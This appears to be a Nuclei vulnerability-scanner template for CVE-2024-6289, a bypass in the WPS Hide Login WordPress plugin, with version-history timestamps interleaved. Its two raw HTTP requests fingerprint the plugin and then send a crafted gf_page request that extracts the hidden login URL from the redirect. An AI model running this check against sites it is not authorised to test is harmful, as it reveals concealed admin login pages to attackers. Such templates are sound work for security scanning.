2024-07-15 18:23:47 +00:00
id : CVE-2024-6289
info :
name : WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure
author : securityforeveryone
severity : medium
description : |
The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
2024-07-15 19:43:56 +00:00
remediation : Fixed in 1.9.16.4
2024-07-15 18:23:47 +00:00
reference :
- https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6289
- https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
classification :
epss-score : 0.00043
epss-percentile : 0.09266
metadata :
verified : true
max-request : 1
vendor : wpserveur
product : wps_hide_login
framework : wordpress
publicwww-query : "/wp-content/plugins/wps-hide-login/"
2024-07-15 19:43:56 +00:00
tags : cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login
flow : http(1) && http(2)
variables :
string : "{{rand_text_alpha(10)}}"
2024-07-15 18:23:47 +00:00
http :
- raw :
- |
GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1
Host : {{Hostname}}
2024-07-15 19:43:56 +00:00
matchers :
- type : dsl
dsl :
- 'contains(body,"WPS Hide Login")'
- 'status_code == 200'
condition : and
internal : true
- raw :
2024-07-15 18:23:47 +00:00
- |
2024-07-15 19:43:56 +00:00
GET /?gf_page={{string}} HTTP/1.1
2024-07-15 18:23:47 +00:00
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2024-07-15 19:43:56 +00:00
- '!contains(tolower(location), "wp-login.php")'
- 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")'
2024-07-15 18:23:47 +00:00
condition : and
extractors :
- type : kval
kval :
- location
2024-07-16 08:42:34 +00:00
# digest: 4a0a00473045022020d4b2a669248c99076dbae2a47bd27614ff41baa828ef6b8f09219e7f5804c10221008cea48e05a376902a9024b466cdcb72992fa8239336fc3085e7ba319e6627de7:922c64590222798bb761d5b6d8e72950
